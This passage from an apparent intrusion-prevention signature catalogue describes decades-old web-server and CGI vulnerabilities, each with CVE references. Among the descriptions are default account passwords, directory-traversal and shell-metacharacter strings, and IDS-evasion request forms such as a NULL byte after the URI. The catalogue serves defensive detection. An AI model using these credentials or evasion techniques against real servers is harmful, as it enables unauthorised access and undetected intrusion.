to sensitive information on the host. This information can be used in subsequent attacks. This signature detects access
to the 'persmbr/VsTmPr.asp' file.
Signature ID: 262
MS Site Server Information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1769 Bugtraq: 3998 Nessus: 11018
Signature Description: Microsoft Site Server is designed to run on Microsoft Windows NT Server platforms. It
provides a means for users on a corporate intranet to share, publish, and find information. Site Server Commerce
Edition incorporates the same features as well as providing an interface for e-commerce sites to interact and conduct
business with customers and suppliers. Microsoft Site Server 3.0 prior to SP4 has a default user called
'LDAP_Anonymous' with a default password of 'LdapPassword_1'. This user account is
added to the 'Guests' group, and is given the 'Log on locally' privilege. Using this account, an attacker can gain access
to sensitive information on the host. This information can be used in subsequent attacks. This signature detects access
to the 'persmbr/VsLsLpRd.asp' file.
Signature ID: 263
MS Site Server Information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1769 Bugtraq: 3998 Nessus: 11018
Signature Description: Microsoft Site Server is designed to run on Microsoft Windows NT Server platforms. It
provides a means for users on a corporate intranet to share, publish, and find information. Site Server Commerce
Edition incorporates the same features as well as providing an interface for e-commerce sites to interact and conduct
business with customers and suppliers. Microsoft Site Server 3.0 prior to SP4 has a default user called
'LDAP_Anonymous' with a default password of 'LdapPassword_1'. This user account is
added to the 'Guests' group, and is given the 'Log on locally' privilege. Using this account, an attacker can gain access
to sensitive information on the host. This information can be used in subsequent attacks. This signature detects access
to the 'persmbr/VsPrAuoEd.asp' file.
Signature ID: 264
Lotus Domino Banner Information Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0245 CVE-2002-0408 Bugtraq: 4049 Nessus: 11009
Signature Description: Lotus Domino is a server product that provides enterprise-grade e-mail and collaboration
capabilities from IBM. When a non-existent Perl script is requested in Lotus Domino 5.0.9 and prior with
'NoBanner' set to 1, the server returns an error message (500) that discloses the physical path of the web
root and the server version information.
Signature ID: 265
IIS 404 error XSS vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0150 CVE-2002-0148 CVE-2002-0074 Bugtraq: 4476,4483,4486 Nessus: 10936
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. In IIS 4.0, 5.0 and 5.1, cross-site scripting vulnerability allows remote attackers to execute arbitrary scripts
via an HTTP error page. The default '404' error page returned by IIS uses scripting to output a link to the top level domain
part of the URL requested. By crafting a special URL it is possible to insert arbitrary script into the page for execution.
The presence of this vulnerability also indicates the presence of multiple vulnerabilities as reported in Microsoft
security bulletin MS02-018 (various remote buffer overflow and cross site scripting attacks).
Signature ID: 266
Attempt to check if IIS server has the .HTR ISAPI filter mapped
Threat Level: Warning
Industry ID: CVE-2002-0071 CVE-2000-1230 Bugtraq: 4474,2274 Nessus: 10932,10943
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. Buffer overflow in the 'ism.dll' ISAPI extension that implements HTR scripting in IIS 4.0 and
5.0 allows attackers to cause a denial of service or execute arbitrary code via HTR requests with long variable names.
Signature ID: 268
JRun directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1544 Bugtraq: 3666 Nessus: 10997
Signature Description: JRun is an application server from Macromedia that is based on Sun Microsystems Java 2
Platform, Enterprise Edition (J2EE). JRun consists of Java Server Page (JSP), Java servlets, Enterprise JavaBeans, the
Java Transaction Service (JTS), and the Java Messaging Service (JMS). JRun works with the most popular Web servers
including Apache, Microsoft's Internet Information Server (IIS), and any other Web server that supports Internet Server
Application Program Interface (ISAPI). Macromedia JRun 2.3.3, Macromedia JRun 3.0 and Macromedia JRun 3.1 are
vulnerable to directory traversal. A successful exploitation of this vulnerability allows an attacker to access sensitive
information on the vulnerable system.
Signature ID: 269
IIS 5.0 Sample Application physical path disclosure vulnerability
Threat Level: Warning
Nessus: 10573
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. A sample application shipped with IIS 5.0 discloses the physical path of the web root. An attacker can use
this information to make more focused attacks.
Signature ID: 270
IIS 5.0 Sample App vulnerable to cross-site scripting attack
Threat Level: Warning
Nessus: 10572
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. The sample script '/iissamples/sdk/asp/interaction/Form_JScript.asp' takes user input into a
form field. On submission, it displays a page with the text that the user entered. This script does not perform any input
validation. Hence, malicious users can use this script to do a cross site scripting attack.
Signature ID: 271
GroupWise Web Interface 'HTMLVER' vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0341 Bugtraq: 4206 Nessus: 10873
Signature Description: GroupWise is a cross-platform collaborative software product from Novell, Inc. offering e-mail,
calendaring, instant messaging and document management. GroupWise includes a web access component for use
through a web browser. In Novell GroupWise Web Access 5.5, GWWEB.EXE allows remote attackers to determine the
physical path of the web server root directory using an HTTP request with an invalid HTMLVER parameter. An attacker
can use this information to make more focused attacks.
Signature ID: 273
GroupWise Web Interface 'HELP' path disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1005 Bugtraq: 879 Nessus: 10877
Signature Description: GroupWise is a cross-platform collaborative software product from Novell, Inc. offering e-mail,
calendaring, instant messaging and document management. GroupWise includes a web access component for use
through a web browser. In Novell GroupWise 5.2 to 5.5 (inclusive), the HELP function in GWWEB.EXE reveals the
physical path of the web server root directory. An attacker can use this information to make more focused attacks.
Signature ID: 274
GroupWise Web Interface 'HELP' file disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1005 Bugtraq: 879 Nessus: 10877
Signature Description: GroupWise is a cross-platform collaborative software product from Novell, Inc. offering e-mail,
calendaring, instant messaging and document management. GroupWise includes a web access component for use
through a web browser. In Novell GroupWise 5.2 to 5.5 (inclusive), the HELP function in GWWEB.EXE is vulnerable to a
file disclosure vulnerability that can be exploited with a '../' character sequence. A malicious user can access any
'.htm' file on the server and browse directory listings. An attacker can use this information to make more
focused attacks.
Signature ID: 275
Finger cgi vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0612 Nessus: 10071,10068
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. The Finger command shows user
information. If the 'finger' command is installed in the cgi-bin directory, it may give sensitive user
information to a malicious user. An attacker can use this information to make more focused attacks.
Signature ID: 277
Unify eWave ServletExec 3.0C file upload vulnerability
Threat Level: Severe
Industry ID: CVE-2000-1024 Bugtraq: 1876 Nessus: 10570
Signature Description: Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers like
Microsoft IIS, Apache and Netscape Enterprise Server. Unify eWave ServletExec 3.0C contains an unregistered servlet
called 'UploadServlet' whose access is not restricted. By sending a specially formed HTTP 'GET' or 'POST' request, it
is possible for a remote user to upload any file to any directory on the web server. Successful exploitation of this
vulnerability could lead to a compromise of the web server.
Signature ID: 278
Authentication bypass in Lotus Domino database access vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1567 Bugtraq: 4022 Nessus: 10953
Signature Description: Lotus Domino Server is an application framework for web based collaborative software. It runs
on multiple platforms. Lotus Domino 5.0.9a and earlier convert '+' characters in a file request to ' ' (space) characters. By
requesting a Notes template file (.ntf) or a Notes database file (.nsf) with a maliciously constructed file name having
a certain number of '+' characters before the .nsf file extension, remote attackers can bypass security restrictions and
view sensitive information in these files.
Signature ID: 279
CVS Entries access misconfiguration vulnerability
Threat Level: Warning
Nessus: 10922
Signature Description: Access to the 'CVS/Entries' path is detected by this signature. Access to this path exposes all file
names in the CVS module on the web server. This may give sensitive information to a malicious user, who can use this
information to make more focused attacks to gain access to these files.
Signature ID: 280
IIS ASP.NET Application Trace log retrieval vulnerability
Threat Level: Warning
Nessus: 10993
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. ASP.NET is a web application framework developed and marketed by Microsoft, that programmers can use
to build dynamic web sites, web applications and web services. The ASP.NET web application running in the root
directory of the web server has application tracing enabled. This allows an attacker to view the last 50 web requests
made to the web server, including sensitive information like Session ID values and the physical path to the requested
file. An attacker can use this information to make more focused attacks.
Signature ID: 281
BroadVision One-To-One Enterprise Physical Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0031 Bugtraq: 2088 Nessus: 10686
Signature Description: BroadVision One-To-One Enterprise is a scalable e-business application platform.
BroadVision One-To-One Enterprise 1.0 allows remote attackers to determine the physical path of server files by
requesting a non existent '.JSP' file. An attacker can use this information to make more focused attacks.
Signature ID: 282
ASP.NET Cross Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0223 Bugtraq: 7731 Nessus: 10844
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. ASP.NET is a web application framework developed and marketed by Microsoft, that programmers can use
to build dynamic web sites, web applications and web services. In Microsoft IIS 4.0 to 5.1 (inclusive), Cross-site
scripting vulnerability (XSS) in the ASP function responsible for redirection allows remote attackers to embed a URL
containing a client side script. This script will execute when redirection message from server is displayed.
Signature ID: 283
AlienForm CGI script vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0934 Bugtraq: 4983 Nessus: 11027
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. AlienForm2 is an interface to the email
gateway written in Perl and is maintained by Jon Hedley. The cgi is typically installed as 'af.cgi' or 'alienform.cgi'. In
Jon Hedley AlienForm2 1.5, directory traversal vulnerability allows remote attackers to read or modify or create
arbitrary files via '.|.%2F' character sequence in the _browser_out parameter or _out_file parameter. This signature
detects attacks on 'af.cgi' program.
Signature ID: 284
AlienForm CGI script vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0934 Bugtraq: 4983 Nessus: 11027
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. AlienForm2 is an interface to the email
gateway written in Perl and is maintained by Jon Hedley. The cgi is typically installed as 'af.cgi' or 'alienform.cgi'. In
Jon Hedley AlienForm2 1.5, directory traversal vulnerability allows remote attackers to read or modify or create
arbitrary files via '.|.%2F' character sequence in the _browser_out parameter or _out_file parameter. This signature
detects attacks on 'alienform.cgi' program.
Signature ID: 285
Agora CGI Cross Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1199 Bugtraq: 3702 Nessus: 10836
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. Agora.cgi is a freely available, open source
shopping cart system. When debug mode is enabled in Agora.cgi 3.2 to 4.0g (inclusive), the script does not
filter HTML tags in the cart_id parameter. As a result, it is possible for an attacker to construct a malicious link with a
client side script code. When the link is clicked by a client, the script code will be executed by the browser in the
context of the web server. This may result in a variety of problems from sensitive information disclosure to session
hijacking. Please note that debug mode must be manually enabled by the web server administrator.
Signature ID: 286
AdMentor sql injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0308 Bugtraq: 4152 Nessus: 10880
Signature Description: AdMentor is a free collection of ASP scripts created by Stefan Holmberg. AdMentor provides
banner ad rotation functionality. SQL injection is a technique that exploits a security vulnerability occurring in the
database layer of an application due to improper filtering of user input. A SQL injection vulnerability has been reported
in admin.asp as provided with AdMentor 2.11 through 'userid' and 'pwd' arguments. This is because special characters
such as ' (quote) are not filtered from user input. This allows remote attackers to bypass authentication and gain
privileges.
Signature ID: 294
Shells in /cgi-bin vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is a software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects GET request access to Bourne shell, Almquist
shell, Bourne-Again shell, C shell, Korn shell, TENEX shell and Z shell in the CGI directory.
Signature ID: 295
Finger web gateway access vulnerability
Threat Level: Warning
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. The Finger command shows user
information. Some web sites implement a web gateway to the "finger" service, allowing remote web clients to execute
finger queries against arbitrary hosts. In environments where the "finger" service has been determined to be a security
risk (due to the sensitivity of the information it provides), a web finger gateway can be used to execute finger queries
against the server, allowing an attacker to obtain information about its users. An attacker can use this information to
make more focused attacks. This signature detects reconnaissance attempts on other hosts using such finger gateway.
Signature ID: 296
AnyForm CGI check vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0066 Bugtraq: 719
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. AnyForm is a CGI program written by John
S. Roberts that allows webmasters to create arbitrary form submission pages without writing a dedicated CGI program
for each form. AnyForm runs the Bourne shell to execute Sendmail, which it uses to send form results to the web
administrator. In AnyForm 1.0 and 2.0, due to improper quoting of form field parameters, an attacker can place shell
meta characters in the form fields. This allows execution of arbitrary commands by the attacker using AnyForm with
the privileges of the web server.
Signature ID: 298
PHP mlog Example Script arbitrary file access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0346 Bugtraq: 713
Signature Description: Personal Home Page/Form Interpreter (PHP/FI) is computer scripting language designed for
producing dynamic web pages. In PHP/FI 1.0 to 2.0b10 (inclusive), the "mlog.html" sample script does not sanitize
input passed to the "screen" variable and hence allows an attacker to read arbitrary files on the web server. An attacker
can use this information to make more focused attacks.
Signature ID: 299
PHP mylog Example Script arbitrary file access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0068 Bugtraq: 713
Signature Description: Personal Home Page/Form Interpreter (PHP/FI) is computer scripting language designed for
producing dynamic web pages. In PHP/FI 1.0 to 2.0b10 (inclusive), the "mylog.html" sample script does not
sanitize input passed to the "screen" variable and hence allows an attacker to read arbitrary files on the web server.
An attacker can use this information to make more focused attacks.
Signature ID: 300
IRIX MachineInfo Script vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1067
Signature Description: IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on
their 32 and 64-bit MIPS architecture workstations and servers. A vulnerability exists in the 'InfoSearch' package as
included by Silicon Graphics in their IRIX operating system versions 5.3 and 6.4. An attacker can obtain sensitive
information about the computer including the type and speed of the processor, memory details, and other details of
installed hardware. An attacker can use this information to make more focused attacks.
Signature ID: 301
WinGate Logfile Server Vulnerability
Threat Level: Information
Signature Description: WinGate Proxy Server provides a Log File Server on port 8010 to remotely view logfiles. In
certain cases this server may be enabled by default. If this service accepts connections from remote hosts, the entire file
system may be accessible, allowing remote users to access, read or download any file on vulnerable system.
Signature ID: 304
Convert.bas arbitrary file access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0175 Bugtraq: 2025
Signature Description: NetWare is a network operating system developed by Novell, Inc. NetWare comes with a set of
services for the TCP/IP stack, one of which is a web server. The Common Gateway Interface (CGI) is a standard protocol
for interfacing external application software with an information server, commonly a web server. In Novell NetWare
Web Server 2.0, a CGI written in BASIC called "convert.bas" allows retrieval of files outside of the normal web server
context. This can be accomplished by submitting the file name and path as a parameter to the script, using a '../../'
character sequence to traverse directories. Access may or may not be limited to the SYS: volume.
Signature ID: 305
ColdFusion Evaluator sample program vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0455 Bugtraq: 115
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. In ColdFusion Server 2.0 to 4.0 ,
'Expression Evaluator' is a sample script included to demonstrate the expression evaluation features of ColdFusion. A
vulnerability exists in this script that could allow remote attackers to create, view or delete arbitrary files on the server.
Even though this program cannot be accessed except from localhost, an attacker can directly request parts of the
program from a remote system. 'openfile.cfm' and 'openedfile.cfm' allow upload of files to the server. 'exprcalc.cfm'
processes the uploaded file, displays it and then deletes it. An attacker can bypass this behaviour by using exprcalc.cfm to
delete itself.
Signature ID: 306
Coldfusion web administration Denial of Service Vulnerability
Threat Level: Warning
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. In ColdFusion 4.0 and 4.0.1,
ColdFusion Administrator with Advanced Security enabled allows remote users to stop the ColdFusion server via the
Start/Stop utility.
Signature ID: 307
HAMCards Postcard arbitrary code execution vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1153
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. HAMCards Postcard script is a Perl mail CGI
Program. HAMCards Postcard script v1.0 Beta 2 allows remote attackers to execute arbitrary commands via shell meta
characters in the recipient email address. This is possible as open() call is used without filtering user input. An attacker
can use shell meta characters such as '|' to execute arbitrary code.
Signature ID: 308
IIS appended dot file disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0154 CVE-1999-0253 Bugtraq: 2074
Signature Description: This version of Microsoft Internet Information Server (IIS) displays the source to active server
pages (.asp files), if a period is appended to the URL. Scripting information, in addition to other data in the file, is
visible. Potentially proprietary web server files (such as .ASP, .HTX, and .IDC file name extensions) may contain
sensitive information (such as user IDs and passwords) embedded in the source code but not normally available to
remote users.
Signature ID: 310
Apache mod_cookies Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0071 Bugtraq: 1821
Signature Description: The Apache Project is a collaborative software development effort aimed at creating a robust,
commercial-grade, feature rich, and freely-available source code implementation of an HTTP (Web) server. Apache
Software Foundation Apache 0.8.11 to 1.1.1 (inclusive) are vulnerable to a buffer overflow attack. This overflow is due
to function make_cookie, in mod_cookies.c using a 100 byte buffer. As a result, remote attackers can exploit this
vulnerability to execute arbitrary code on the server with the privileges of Apache server.
Signature ID: 311
Apache Debian Information disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0678 Bugtraq: 318
Signature Description: The Debian GNU/Linux 2.1 apache package allows any remote user to view /usr/doc if default
settings are used. This is because 'srm.conf' file is preconfigured with the alias mapping '/doc/' to '/usr/doc/'. This allows
a remote attacker to gain access to sensitive information such as the versions of the software installed. An attacker can
use this information to make more focused attacks.
Signature ID: 313
IIS .htr file access misconfiguration vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0407 Bugtraq: 2110
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. Microsoft IIS 4.0 installs a remotely accessible directory called '/IISADMPWD' which is mapped to
'c:\winnt\system32\inetsrv\iisadmpwd'. This directory contains a number of vulnerable '.HTR' files. These files were
designed to allow system administrators the ability to provide HTTP based password change services to network users.
These files can be used to determine whether or not an account exists on the host, as well as to conduct brute force
attacks. The response messages from the server allow an attacker to determine if his request was valid or not.
These files can also be used to conduct the same type of attacks on other hosts in the LAN. Thus, an attacker can gain
access to any system on the same LAN using this vulnerability.
Signature ID: 314
IIS sample script source code disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0739 CVE-2002-1744 CVE-2002-1745
Signature Description: The "codebrws.asp" sample shipped with IIS 4.0 and SiteServer 3.x can be remotely exploited
to read arbitrary files on vulnerable servers. This file is one of several sample files distributed with these servers that
allows remote file viewing.
Signature ID: 317
Sambar Server Default Account vulnerability
Threat Level: Warning
Bugtraq: 2255
Signature Description: Sambar Server is a multi-threaded HTTP, FTP, and Proxy server for Windows NT. By default
the server ships with the default account "admin" with no password, which could allow a remote attacker to gain
complete control of your server if it is not changed. The server also ships with two other, though non-privileged
accounts "anonymous" and "guest" which should be disabled.
Signature ID: 318
NT Site Server sample Ad Server information disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1520 Bugtraq: 256
Signature Description: Microsoft Site Server is a software solution from Microsoft for Internet-based commerce (or
e-commerce). A vulnerability exists in Microsoft Site Server 3.0 alpha. The 'Ad Server' Sample directory has the
'SITE.CSC' file which contains sensitive configuration information about the SQL database. Due to misconfiguration in
default access control specifications, the Microsoft Site Server allows retrieval of this file. Information gained from this
may lead to compromise of highly sensitive information on the web server.
Signature ID: 325
O'Reilly WebSite win-c-sample.exe buffer overflow vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0178 Bugtraq: 2078 Nessus: 10008
Signature Description: O'Reilly WebSite Professional is a Windows based Web Server package. One of the sample
programs in O'Reilly Software WebSite Professional 1.0 to 2.0 (inclusive) is vulnerable to a buffer overflow that allows
execution of arbitrary commands on the host machine with the privileges of the web server. The vulnerability exists in
'win-c-sample.exe' CGI program available in '/cgi-shl/' directory.
Signature ID: 328
Nph-publish arbitrary file overwrite vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1177
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. 'nph-publish' is a perl CGI script that allows
Apache to "publish" files created with HTML editors like Netscape Navigator Gold. Directory traversal vulnerability in
nph-publish before 1.2 allows remote attackers to overwrite arbitrary files via a '..' (dot dot) character sequence in the
path name for an upload operation. A malicious attacker can gain complete control of the server using this
vulnerability.
Signature ID: 329
Textcounter.pl cgi arbitrary command execution vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1479 Bugtraq: 2265
Signature Description: Textcounter.pl is a script by Matt Wright that provides features like counters, guest books, and
http cookie management to the website. Due to insufficient validation of user input in Matt Wright TextCounter 1.2, it
is possible for a remote user to manipulate the contents of '$DOCUMENT_URI' environment variable so that they will
be executed with the UID of the httpd process when parsed by the interpreter. A malicious user can hence execute
arbitrary commands on the web server.
Signature ID: 330
ColdFusion fileexists.cfm file status information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0923
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion Server 4.0 contains a
flaw that allows a remote attacker to confirm the existence of any file on the server. The flaw is due to insufficient
checking of arguments passed to the fileexists.cfm script.
Signature ID: 331
ColdFusion sourcewindow.cfm arbitrary file disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0922 Bugtraq: 3154
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. A vulnerability in ColdFusion
Server 4.0 sample program 'sourcewindow.cfm' could allow remote attackers to read any file on the system. An
attacker can use this information to make more focused attacks.
Signature ID: 332
ColdFusion viewexample.cfm arbitrary file disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0923
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion Server 4.0 contains a
flaw that allows a remote attacker to gain sensitive information. The flaw is due to insufficient checking of arguments
passed to the 'viewexample.cfm' script. This could allow the attacker to view any file on the server. An attacker can use
this information to make more focused attacks.
Signature ID: 333
ColdFusion Syntax Checker DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0924
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion Server 4.0 contains a
flaw that allows a remote attacker to cause a denial of service. The flaw is due to insufficient checking of arguments
passed to the Syntax Checker program.
Signature ID: 334
Bnbform CGI File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0937 Bugtraq: 2147
Signature Description: BNBForm is a form processing script by BigNoseBird. BNBForm supports automatic form-to-email
processing of user submitted forms. A vulnerability in how this is implemented could allow a remote attacker to
receive arbitrary files on the vulnerable server. This signature triggers an alarm when any access to bnbform.cgi is
detected.
Signature ID: 335
BNB survey.cgi CGI arbitrary command execution Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0936 Bugtraq: 1817
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. Big Nose Bird Survey.cgi is a free and simple
'Web Survey' program. Due to insufficient checking of arguments in BNBSurvey 1.0, shell metacharacters (such as the
pipe '|' character, redirection characters '>' and '<') in user supplied input are not filtered. This allows an attacker to
execute shell commands with the privileges of the web server.
Signature ID: 336
Multiple vulnerabilities in Classifieds.cgi CGI script
Threat Level: Warning
Industry ID: CVE-1999-0934 CVE-1999-0935 Bugtraq: 2020
Signature Description: Classifieds.cgi is a perl script that is part of the classifieds package by Greg Matthews. This
CGI script provides management functionality for classified ads on web sites. Due to insufficient validation of user
input, an attacker can read arbitrary files and execute arbitrary commands with the privileges of the web server. One of
the vulnerable fields is the form field used for e-mail address details. The other attribute is a hidden variable in a CGI
form.
Signature ID: 337
Counter.exe CGI DoS Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-1030 Bugtraq: 267
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. counter.exe is a web hit counter program. A
set of vulnerabilities in Behold! Software Web Page Counter 2.7 enables denial of service attacks. These are possible
due to insufficient input validation. This signature detects DoS attack attempts caused due to a long URI string.
Signature ID: 340
Novell files.pl arbitrary file access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1081
Signature Description: NetWare is a network operating system developed by Novell, Inc. NetWare comes with a set of
services for the TCP/IP stack, one of which is a web server. The Common Gateway Interface (CGI) is a standard protocol
for interfacing external application software with an information server, commonly a web server. In Novell Web Server
1.0 Examples Toolkit, a vulnerability in the files.pl script allows a remote attacker to view the contents of any file or
directory on vulnerable servers with the privileges of the user owning the server process.
Signature ID: 341
View-Source CGI arbitrary file access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0174 Bugtraq: 2251
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. SCO Skunkware is a collection of Open
Source software projects ported, compiled, and packaged for free redistribution on SCO operating environments. The
'view-source' CGI script in SCO Skunkware 2.0 could allow a remote attacker to view files on the Web server. By
accessing the view-source script with specially formatted arguments, a remote attacker can view the contents of any file
on the system with the privileges of the user owning the server process. An attacker can use this information to make
more focused attacks.
Signature ID: 342
Wwwboard.pl CGI arbitrary post modification vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0930 Bugtraq: 1795
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. The WWWBoard package is a popular web
based discussion board by Matt Wright. Matt Wright WWWBoard 2.0 Alpha 2 allows a remote attacker to delete or
overwrite message board articles via a malformed argument. This is accomplished by submitting a POST request of
hidden type with attribute 'name' having value as 'followup' and attribute 'value' having value corresponding to a
previously existing message.
Signature ID: 343
Long HTTP Request Line Detection
Threat Level: Information
Industry ID: CVE-1999-0931 CVE-2001-0282 CVE-2000-0398 CVE-2000-0626 Bugtraq: 734,1244,1482 Nessus:
10958,10637,10012,10421
Signature Description: This rule is triggered when a URL longer than the configured value is detected. Under normal
conditions, URLs of such length are rarely sent. The presence of such a lengthy URL is suspicious (unless the server
accepts GET requests with many parameters for a particular script). A very long HTTP request line can trigger a
buffer overflow in the remote HTTP server, which an attacker may use to execute arbitrary code on the host. The
administrator is advised to check the target web server logs to analyze the session associated with this log.
Signature ID: 344
HTTP large request header Size detection
Threat Level: Information
Industry ID: CVE-2001-0282 CVE-2000-0398 CVE-2004-0594 CVE-2000-0626 Bugtraq: 10725,1244,1482 Nessus:
10637,10012,10421
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and
entity-header fields, follow the same generic format as that given in RFC 822. Each header field consists of a name
followed by a colon (":") and the field value. Although no RFC specifies a limit, a server may assume some limit
for each field, and any attempt to put more data than expected into a field may result in a buffer overflow.
Some server implementations allocate a limited buffer for the overall header size. In that case, an overflow may
occur under either of two conditions: a) a large amount of data is supplied in a single field; or b) all (or most)
fields are given sufficiently large data that the overall header size grows. This rule tries to capture any such
attempt. An attacker may use this vulnerability to execute arbitrary code on the host. This rule is triggered when
the request header size exceeds the value configured in the IIPS Manager. The administrator is advised to check the
HTTP server logs for any misuse.
Signature ID: 345
HTTP Long Header Line Size detection
Threat Level: Critical
Industry ID: CVE-1999-0751 CVE-1999-0867 CVE-2004-0594 CVE-2005-1935 Bugtraq: 10725,579,631 Nessus:
10515,10154,10119
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and
entity-header fields, follow the same generic format as that given in RFC 822. Each header field consists of a name followed
by a colon (":") and the field value. A buffer overflow in the remote HTTP server is possible when one of the
header fields in a request is given a very long argument (line). An attacker may use it to execute arbitrary code on
the host. This rule is triggered when the size of a header line in a request exceeds the configured value.
Signature ID: 346
Detection of large number of request header lines
Threat Level: Critical
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. HTTP header fields, which include general-header, request-header, response-header, and
entity-header fields, follow the same generic format as that given in RFC 822. Each header field consists of a name
followed by a colon (":") and the field value. A buffer overflow in the remote HTTP server is possible when it is
given a large number of header lines in a request. An attacker may use it to execute arbitrary code on the host.
This rule is triggered when the number of header lines exceeds the configured value.
Signature ID: 347
HTTP malformed Request detection
Threat Level: Information
Signature Description: This signature detects an IIPS evasion technique. According to the HTTP RFC, a v1.0 request
should be in the form Method <space> URI <space> HTTP/Version CRLF. As a result, many intelligent IDS/IPS
systems dissect HTTP requests using <space> as a separator. Apache 1.3.6 and newer allow HTTP requests in the form
Method <tab> URI <tab> HTTP/Version CRLF. Such a request will cause parsing problems for an IDS/IPS system that
assumes the RFC-based format.
Signature ID: 348
IDS evasion detection - NULL Character at the end of URI
Threat Level: Information
Signature Description: This signature detects an IIPS evasion technique. Many C string libraries use the NULL
character to denote the end of a string. Most intrusion detection systems use these libraries or assume the same. An
attacker can use this to evade the system with the following type of request: GET /cgi-bin/some.cgi\0 HTTP/1.0. As
many IDS/IPS try to parse the entire packet, they stop at the null byte, ignoring the rest of the request. The HTTP
server, on the other hand, maintains each field in the request packet as a logically separate field. As a result, a
NULL byte at the end of the URI is treated as the termination of the URI, and the other fields are decoded separately.
Signature ID: 349
HTTP v0.9 Syntax Request detection
Threat Level: Information
Signature Description: The Hypertext Transfer Protocol (HTTP) is an application-level protocol, with its version 1.1
defined in RFC 2616. The current HTTP version is 1.0 or 1.1. The older version 0.9 is not used by most servers and
